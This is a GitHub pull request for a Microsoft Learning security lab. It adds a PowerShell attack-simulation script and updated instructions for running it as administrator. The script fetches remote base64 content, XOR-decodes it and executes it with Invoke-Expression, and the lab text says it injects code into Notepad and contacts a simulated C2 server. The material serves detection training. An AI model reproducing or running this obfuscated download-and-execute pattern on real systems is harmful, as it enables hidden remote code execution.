### PR TITLE
Resolve issue #265 Learning Path 2, Exercise 2: Attack simulation script is malformed and the output step is wrong

### DIFF
--- a/Allfiles/attacksim.ps1
+++ b/Allfiles/attacksim.ps1
@@ -1,0 +1,5 @@
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
+$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
+$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
+$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
+$i++; if ($i -eq $xor.Length) {$i = 0} }; Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

--- a/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md
+++ b/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md
@@ -90,7 +90,7 @@ In this task, you will simulate an attack on the WIN1 virtual machine and verify
     $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
     ```
 
-    >**Note:** If you experience errors (in red) while running the script, you can open the Notepad app and copy the script into a blank file. Make sure *word wrap* is turned on in Notepad. Copy and run each line of the script separately in PowerShell.
+    >**Note:** If you experience errors (in red) while running the script, you can open the Notepad app and copy the script into a blank file. Make sure *word wrap* is turned on in Notepad. Then, copy and run each line of the script separately in PowerShell. Also, a PowerShell script (attacksim.ps1) was provided in the files downloaded at the beginning of the labs. To use the script, in **Windows PowerShell (Admin)** navigate to the *\Users\Admin\Desktop* folder and type *.\attacksim.ps1* and press **Enter** to run it.
 
 1. The script will produce several lines of output and a message that it *Failed to resolve Domain Controllers in the domain*. A few seconds later, the *Notepad* app will open. A simulated attack code will be injected into Notepad. Keep the automatically generated Notepad instance open to experience the full scenario. The simulated attack code will attempt to communicate to an external IP address (simulating a C2 server).
 


### PR DESCRIPTION
**Replace issue name M00-LAB00:QUICK_DESCRIPTION, for example "M01-LAB01: My new issue" (or same name as linked Issue)**

## Related Issue

**Link related Github Issue** 🢂 Fixes #265  . (Include issue number after #)

## Checklist 
Mark completed with "x" between brackets, "[x]", or checking the box once the PR is created:
- [X] Has related GitHub Issue 💥 [Create Issue](https://github.com/MicrosoftLearning/AZ400-DesigningandImplementingMicrosoftDevOpsSolutions/blob/master/.github/CONTRIBUTING.md#reporting-issues) 📝
- [X] Tested it
- [X] Read the PR collaboration guide 👓 [Collaboration Guide](https://github.com/MicrosoftLearning/AZ400-DesigningandImplementingMicrosoftDevOpsSolutions/blob/master/.github/CONTRIBUTING.md#pull-requests) 📝

Changes proposed in this pull request:

- Added PowerShell script
- Updated instructions
-
